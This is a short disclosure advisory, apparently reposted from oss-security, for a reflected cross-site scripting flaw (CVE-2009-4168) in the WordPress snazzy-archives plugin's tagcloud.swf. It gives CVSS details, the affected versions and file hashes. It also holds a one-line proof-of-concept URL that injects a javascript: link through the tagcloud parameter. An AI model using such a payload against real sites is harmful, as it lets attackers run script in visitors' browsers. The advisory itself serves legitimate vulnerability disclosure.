WordPress plugin snazzy-archives XSS vulnerability

2013.03.11

Credit: Henri Salo

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2009-4168

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

Plugin URL: http://wordpress.org/extend/plugins/snazzy-archives/
Versions affected: 1.7.1 and below
Reported to WordPress plugins team: 2013-02-03
Status: Plugin currently disabled by WordPress plugins team. Not fixed by plugin maintainer.

PoC: 
wp-content/plugins/snazzy-archives/i/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert%28%22oss-security%20is%20great!%22%29%27+style=%27font-size:+40pt%27%3Efree%20pr0n%3C/a%3E%3C/tags%3E

faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/0.6.1/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/0.5.2/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.3/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/0.4/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.6.2/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.5.1/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.4.1/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.4/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/0.5.1/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.2.3/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.5.2/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.0/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.7.1/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.5/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.3.1/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.2.1/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.6.3/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/0.5/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.2/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.7.0/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.3.2/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.0.1/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/1.2.2/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/tags/0.6/i/tagcloud.swf
faa1b18d043ab7653e0f79d44450b802d2b6627e  ./snazzy-archives/trunk/i/tagcloud.swf

--
Henri Salo

References:

http://seclists.org/oss-sec/2013/q1/614

http://wordpress.org/extend/plugins/snazzy-archives/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress plugin snazzy-archives XSS vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.